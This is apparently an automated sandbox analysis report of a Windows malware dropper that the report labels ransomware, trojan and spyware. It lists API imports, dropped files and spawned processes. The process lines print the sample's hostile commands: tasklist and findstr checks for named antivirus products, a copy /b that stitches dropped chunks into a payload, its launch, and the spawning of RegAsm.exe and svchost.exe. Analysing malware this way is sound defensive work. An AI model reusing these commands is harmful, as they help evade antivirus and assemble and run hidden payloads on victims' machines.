                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeCode function: 3_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,3_2_004050CD
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_00242600 MultiByteToWideChar,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,GlobalFree,4_2_00242600
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_00242640 OpenClipboard,GetClipboardData,GlobalLock,free,GlobalUnlock,CloseClipboard,CloseClipboard,CloseClipboard,4_2_00242640
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeCode function: 3_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,3_2_004044A5
                  Source: setup.exe, 00000002.00000003.1329055318.000000007FCED000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_3e8f93a6-e
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\dinput8.dllJump to behavior
                  Source: setup.exe, 00000002.00000003.1327544227.00000000025C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_89770716-1
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0024AFA0 GetPropW,DefWindowProcW,ShowWindow,GetRawInputData,free,calloc,MonitorFromWindow,GetMonitorInfoW,TrackMouseEvent,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,SetCursor,DragQueryFileW,DragQueryFileW,calloc,DragQueryPoint,DragQueryFileW,calloc,DragQueryFileW,free,free,free,DragFinish,SetCapture,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,ReleaseCapture,GetMessageTime,PeekMessageW,SetWindowPos,GetMonitorInfoW,SetWindowPos,GetClientRect,ClientToScreen,ClientToScreen,ClientToScreen,ClipCursor,GetClientRect,ClientToScreen,ClipCursor,SetCursor,SetThreadExecutionState,AdjustWindowRectEx,LoadCursorW,SetCursor,SystemParametersInfoW,SystemParametersInfoW,SystemParametersInfoW,SetThreadExecutionState,SystemParametersInfoW,AdjustWindowRectEx,4_2_0024AFA0
                  Source: Yara matchFile source: 18.3.svchost.exe.5420000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.3.svchost.exe.5420000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.3.svchost.exe.5200000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000012.00000003.1704529751.0000000005200000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000003.1705181582.0000000005420000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8060, type: MEMORYSTR

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeFile created: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe entropy: 7.99316440556Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeFile created: C:\Users\user\AppData\Local\Temp\Ongoing entropy: 7.99693237585Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeFile created: C:\Users\user\AppData\Local\Temp\Atm entropy: 7.99734017055Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeFile created: C:\Users\user\AppData\Local\Temp\Jones entropy: 7.99695583409Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeFile created: C:\Users\user\AppData\Local\Temp\Busy entropy: 7.99772506994Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeFile created: C:\Users\user\AppData\Local\Temp\Norwegian entropy: 7.99689152681Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeFile created: C:\Users\user\AppData\Local\Temp\Biology entropy: 7.99804795371Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeFile created: C:\Users\user\AppData\Local\Temp\Invoice entropy: 7.9974280948Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeFile created: C:\Users\user\AppData\Local\Temp\Bahamas entropy: 7.99748235643Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeFile created: C:\Users\user\AppData\Local\Temp\Huge entropy: 7.99377944152Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeFile created: C:\Users\user\AppData\Local\Temp\Particularly entropy: 7.99798135853Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeFile created: C:\Users\user\AppData\Local\Temp\Total entropy: 7.99705806378Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeFile created: C:\Users\user\AppData\Local\Temp\Lane entropy: 7.99819170635Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeFile created: C:\Users\user\AppData\Local\Temp\Cu entropy: 7.99809135944Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeFile created: C:\Users\user\AppData\Local\Temp\Beef entropy: 7.99702030843Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeFile created: C:\Users\user\AppData\Local\Temp\False entropy: 7.99823283601Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeFile created: C:\Users\user\AppData\Local\Temp\Practices entropy: 7.99791717913Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeFile created: C:\Users\user\AppData\Local\Temp\Handed entropy: 7.99676527336Jump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\422648\B entropy: 7.99986688075Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_00212520: DeviceIoControl,WideCharToMultiByte,4_2_00212520
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeCode function: 3_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,3_2_00403883
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_00209A07 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,4_2_00209A07
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_00209A41 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,4_2_00209A41
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeFile created: C:\Windows\ImplicationsKoJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeFile created: C:\Windows\PctUpsetJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeCode function: 3_2_0040497C3_2_0040497C
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeCode function: 3_2_00406ED23_2_00406ED2
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeCode function: 3_2_004074BB3_2_004074BB
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0024AFA04_2_0024AFA0
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001FC1614_2_001FC161
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0020C3D04_2_0020C3D0
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_002523604_2_00252360
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_002843404_2_00284340
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0020C3D04_2_0020C3D0
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_002804304_2_00280430
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0020C3D04_2_0020C3D0
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0020C3D04_2_0020C3D0
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0020C3D04_2_0020C3D0
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0027A4F04_2_0027A4F0
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001FA5304_2_001FA530
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001FC5564_2_001FC556
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001DA5D04_2_001DA5D0
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001FC5F44_2_001FC5F4
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0020A6124_2_0020A612
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001F86904_2_001F8690
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001F27104_2_001F2710
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001F27B94_2_001F27B9
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0027CA504_2_0027CA50
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0021CADC4_2_0021CADC
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_00226B014_2_00226B01
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_00260B004_2_00260B00
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0025EB704_2_0025EB70
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_00250B804_2_00250B80
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001FCC114_2_001FCC11
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_00242D104_2_00242D10
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_00222DC04_2_00222DC0
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_00262E504_2_00262E50
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001E8E804_2_001E8E80
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_00238FE74_2_00238FE7
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_002090584_2_00209058
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001FD1004_2_001FD100
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001F91504_2_001F9150
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0021B2364_2_0021B236
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0023720D4_2_0023720D
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001C32C04_2_001C32C0
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0022F31B4_2_0022F31B
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_002193C24_2_002193C2
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_002095304_2_00209530
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001DD5404_2_001DD540
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_002555D04_2_002555D0
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0027B6704_2_0027B670
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0021964C4_2_0021964C
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0025B7E04_2_0025B7E0
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0020DC304_2_0020DC30
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_00255D704_2_00255D70
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_00235E6C4_2_00235E6C
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001E7F504_2_001E7F50
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001F9FCC4_2_001F9FCC
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeCode function: 17_2_0544A1C017_2_0544A1C0
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\422648\Ai.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeCode function: String function: 004062A3 appears 57 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: String function: 0027F1F0 appears 186 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: String function: 0023F1D0 appears 184 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: String function: 002470E0 appears 67 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: String function: 00300FC0 appears 69 times
                  Source: PQwHxAiBGt.exeBinary or memory string: OriginalFileName vs PQwHxAiBGt.exe
                  Source: PQwHxAiBGt.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@33/28@3/2
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_002470E0 GetLastError,FormatMessageW,WideCharToMultiByte,4_2_002470E0
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001ED6B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleW,GetProcAddress,4_2_001ED6B0
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_00209A07 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,4_2_00209A07
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_00209A41 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,4_2_00209A41
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeCode function: 3_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,3_2_004044A5
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeCode function: 3_2_004024FB CoCreateInstance,3_2_004024FB
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001C1AA0 GetModuleHandleW,FindResourceW,LoadResource,LockResource,SizeofResource,4_2_001C1AA0
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.logJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1824:120:WilError_03
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpMutant created: \Sessions\1\BaseNamedObjects\DARKSiDERSCUSTOM ORDER MAID 3D2 The Extreme Sadist Queen Who Arouses The Hearts Of Masochists
                  Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-6819bdd2-0035-7461a9-207e610965a6}
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeFile created: C:\Users\user\AppData\Local\Temp\setup.exeJump to behavior
                  Source: PQwHxAiBGt.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: PQwHxAiBGt.exeReversingLabs: Detection: 52%
                  Source: PQwHxAiBGt.exeString found in binary or memory: /LOADINF="filename"
                  Source: unknownProcess created: C:\Users\user\Desktop\PQwHxAiBGt.exe "C:\Users\user\Desktop\PQwHxAiBGt.exe"
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeProcess created: C:\Users\user\AppData\Local\Temp\setup.exe "C:\Users\user\AppData\Local\Temp\setup.exe"
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeProcess created: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe "C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe"
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmp "C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmp" /SL5="$104AA,1145856,1145856,C:\Users\user\AppData\Local\Temp\setup.exe"
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Me Me.cmd & Me.cmd
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 422648
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Total + ..\Jones + ..\Handed + ..\Norwegian + ..\Beef + ..\Cu + ..\Biology + ..\Busy + ..\Bahamas + ..\Invoice + ..\Practices + ..\Atm + ..\Particularly + ..\Ongoing + ..\Lane + ..\False + ..\Huge B
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\422648\Ai.com Ai.com B
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comProcess created: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comProcess created: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeProcess created: C:\Users\user\AppData\Local\Temp\setup.exe "C:\Users\user\AppData\Local\Temp\setup.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeProcess created: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe "C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmp "C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmp" /SL5="$104AA,1145856,1145856,C:\Users\user\AppData\Local\Temp\setup.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Me Me.cmd & Me.cmdJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 422648Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Total + ..\Jones + ..\Handed + ..\Norwegian + ..\Beef + ..\Cu + ..\Biology + ..\Busy + ..\Bahamas + ..\Invoice + ..\Practices + ..\Atm + ..\Particularly + ..\Ongoing + ..\Lane + ..\False + ..\Huge BJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\422648\Ai.com Ai.com BJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comProcess created: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comProcess created: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeSection loaded: samcli.dllJump to behavior
